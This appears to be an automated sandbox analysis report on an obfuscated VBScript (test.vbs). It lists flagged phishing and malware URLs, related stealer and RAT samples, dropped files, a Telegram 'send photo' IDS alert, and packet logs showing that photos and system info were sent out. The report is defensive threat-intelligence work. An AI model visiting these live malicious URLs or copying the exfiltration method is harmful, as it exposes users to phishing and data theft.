                                                                                                                      CLOUDFLARENETUShttps://click.mailchimp.com/track/click/30010842/forms.office.com?p=eyJzIjoiUU5MTE43blNUdEQxbUdOR3lwdVJ3M1kyVHBzIiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2Zvcm1zLm9mZmljZS5jb21cXFwvUGFnZXNcXFwvU2hhcmVGb3JtUGFnZS5hc3B4P2lkPWkwYWxtWEtzYWtDTnNoUThad2JsWnVHaXRELXJkRk5MbngxZkVDU0RBUGRVT1VWWE9WSTJUa0ZNVFRaSU1EUldUa2RZVmtWSlEwczBVUzR1JnNoYXJldG9rZW49cWhZMVVQRWtyM0NGdjJpcUlpTUtcIixcImlkXCI6XCIzYjUxMDE1ZDY0ODc0ZDdkOWMwNjg2OGM5Y2M5OWVjOFwiLFwidXJsX2lkc1wiOltcIjVkMTg5YTdhMzU1NWIyZWQ5ZjBlNmQ4ZTM3MWFjZmM1ZDE4NzMwYmRcIl19In0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      http://nvidia-release.orgGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      poc.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.19.24
                                                                                                                      https://r.bgroupusportugal.pt/redirect.php?disp=morta_ans11_10-02_20_50000&idc=1&email=uuser@wpb.org&mode=resetPassword&oobCode=fA9TMT-qLiJF54BFl3bAmwEgjXEBn69dwNFjpDzVlzcAAAGU8a8rwg&apiKey=AIzaSyD3eywpo5yGXrXV5Eo__cDlhXtgd0VYeNc&lang=enGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.191.223
                                                                                                                      https://iedfuj.luucco.cl/ijueiu/iujiur/dGVzdEB0ZXN0LmNvbQo=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.40.115
                                                                                                                      file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                      • 172.67.192.39
                                                                                                                      https://employerschoiceonline.instascreen.net/is/app/applicantPortal?referenceNumber=376641Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.249.203
                                                                                                                      https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/9157562603/xCoLsHUiUn/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.16.2.189
                                                                                                                      http://coinlaw.ioGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.79.73
                                                                                                                      https://handymanproservices.com/wp-includes/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.2.8

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0epoc.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      https://handymanproservices.com/wp-includes/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      https://app.seesaw.me/pages/shared_item?item_id=item.6bc26822-ea06-488d-af24-af6dcd83acbe&share_token=NlfbZ6LrQHSy4jPYNGp-FQ&mode=shareGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      3e#U043d.docGet hashmaliciousEternity StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      windows.ps1Get hashmaliciousXmrigBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      c12f54a3f91dc7bafd92cb59fe009a35Ld0lvdQ1Rn.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      d6rzahY8IU.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      KF2ZqmJMeN.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      nj.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      SQPKHjjgui.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 193.124.205.6
                                                                                                                      Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 193.124.205.6

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9434
                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                      Malicious:false
                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64
                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e...........................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qlebmge.011.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d13xror1.pum.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwtxwxrf.ode.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hx4tr3du.htx.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlthbn34.f3s.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5d0nr3c.f3x.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5qwc3ou.rec.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w03kj1jx.t3u.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmuviqns.iv0.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztdfz4cb.u3m.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Roaming\Firewall\2025-02-11

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):320
                                                                                                                      Entropy (8bit):7.217236288521178
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:YI/8UDgg2SD8kgGrNvyAz0Hzw4M9v+9ygmYPJBn74wK:YIU/g3D8k/hKZz4cyg7xVNK
                                                                                                                      MD5:C24B32A8883DAB52DB7C222EC7D44EB0
                                                                                                                      SHA1:897CF5E61F7CB656B139A846F98175ADDBBBE756
                                                                                                                      SHA-256:9DB6F9A6F6AEB1FB5909186B6DF570AF71300E8C6F4DC0F1B26AEB7E99691BB2
                                                                                                                      SHA-512:6ABC67C874D7A36F99CBC70D091C43ACE298EF5DDC77437BB297A5F3B30E314A6DF930FE63E6882E378BD1BF2287477887EA9599D9C4E4069E166FC6BAAD2444
                                                                                                                      Malicious:false
                                                                                                                      Preview:.ku.....&.w^.oRb.....h.;].m.K{.+...J.K8;4.5.OE.......QP.`8.5V.um...:.{.:...q.UZ:.....S.Lk..Pn..k.}(.....{...5....RxIer.Qe..!.:LT.y.....S>...u...OAy..>...&w..E..qy..lrL..M...........7...X...+D....a.>R...18xz.l..t.AK.........0u*...TlG[7.R7.ksD..I$.A.4.[G.........m9.....r..t..V.....yM...P...L.......iz..

                                                                                                                      \Device\ConDrv

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):42
                                                                                                                      Entropy (8bit):4.055675387364055
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:qNLzbWtiJ1a8cv:qNL3BC8e
                                                                                                                      MD5:A147A66AFE03E023E79474CF2559C5F4
                                                                                                                      SHA1:52655884864E83AD7893722B8EA31F2DAB427052
                                                                                                                      SHA-256:65328D064111F99ED10ECEF103C863D09F72CE34998555C0A23EFBFE2771079F
                                                                                                                      SHA-512:60E60FCB5A5843F4BE539DDE3762E330E5738C9118D769ED1E18FF2BEB8FBAE745DFBDE735B73CC2D4DA11041D981A9478BF854C9CE3EE21C2380179D8C7D43B
                                                                                                                      Malicious:false
                                                                                                                      Preview:Photo and system info sent successfully...

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:ASCII text, with very long lines (1215), with CRLF line terminators
                                                                                                                      Entropy (8bit):5.688887184223319
                                                                                                                      TrID:
                                                                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                                                                      File name:test.vbs
                                                                                                                      File size:1'324'656 bytes
                                                                                                                      MD5:3808fc59fa6559e0400c8c114757cb69
                                                                                                                      SHA1:a920afd77fcadfc2df8d5f7114c636f0938406f4
                                                                                                                      SHA256:9b7f05da0f9dfe94f3b6dcb325e6eb08f50333d5bf7d88da97fbcb51986b1bf9
                                                                                                                      SHA512:2f07b91725ee45745a031c1c34ae67886d521bc0dfc9c95fb3e03e43113297962d4eb335e9fd696e5ce54cd9c7ffb8e4a4b6926e14a4e2770794368f6d092cf4
                                                                                                                      SSDEEP:24576:/O6JbleY+bvnvp1nfyP3Wa1FnLW5DfSSeRQtSEKuVLgHeS7neHqY4:N4Y+bvTO3Wa1FnLWVfwnE5/S7neHW
                                                                                                                      TLSH:4455F1598858CF9F842B8A7970732056B9503CBBD858C640FDD3D93B28EA7E0F57B285
                                                                                                                      File Content Preview:rbrMXcn = "_4{b^R3(u:)R|Q$bF^TK,\Tc15,eXhCdu:]bl}]RlRX(l*3(uI),5kXMNR[I#ACaH:$Q$*XR|QX\T^TK,\Tc15,eXBCLy*:O5FTT[hCaH:$Q$*XR|4{b^R3(u:)R64{b^R3(u:)R|Q$bF^TK&QD]1:HO)BCL?N$,:*$e:BCL,\Tc15,eXh~b1*lLy*:O5FTT[B`>|(kQll],~lkO^MDN(:Xd4c;Is!{(`:l(6:FIsQlN}:)T5dFI

                                                                                                                      File Icon

                                                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-02-11T17:32:38.586864+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.1049797149.154.167.220443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Feb 11, 2025 17:32:35.414854050 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:35.414904118 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:35.414983034 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:35.615291119 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:35.615331888 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.108900070 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.109052896 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:36.115178108 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:36.115192890 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.115806103 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.122858047 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:36.163326025 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.261779070 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.261850119 CET44349782172.67.74.152192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.262003899 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:36.274983883 CET49782443192.168.2.10172.67.74.152
                                                                                                                      Feb 11, 2025 17:32:36.285310030 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:36.285365105 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:36.285435915 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:36.285805941 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:36.285823107 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.022464037 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.022511005 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.022584915 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.025544882 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.025559902 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.134736061 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.134862900 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:37.136502981 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:37.136512995 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.136800051 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.137610912 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:37.183320999 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.329883099 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.329965115 CET44349788195.201.57.90192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.330027103 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:37.409055948 CET49788443192.168.2.10195.201.57.90
                                                                                                                      Feb 11, 2025 17:32:37.635265112 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:37.635308027 CET44349797149.154.167.220192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.635374069 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:37.636086941 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:37.636104107 CET44349797149.154.167.220192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.894413948 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.894494057 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.896168947 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.896179914 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.896430016 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.906083107 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:37.906132936 CET44349793193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:37.906203985 CET49793443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:32:38.281718016 CET44349797149.154.167.220192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:38.281853914 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:38.285130978 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:38.285140038 CET44349797149.154.167.220192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:38.285466909 CET44349797149.154.167.220192.168.2.10
                                                                                                                      Feb 11, 2025 17:32:38.287980080 CET49797443192.168.2.10149.154.167.220
                                                                                                                      Feb 11, 2025 17:32:38.331331015 CET44349797149.154.167.220192.168.2.10
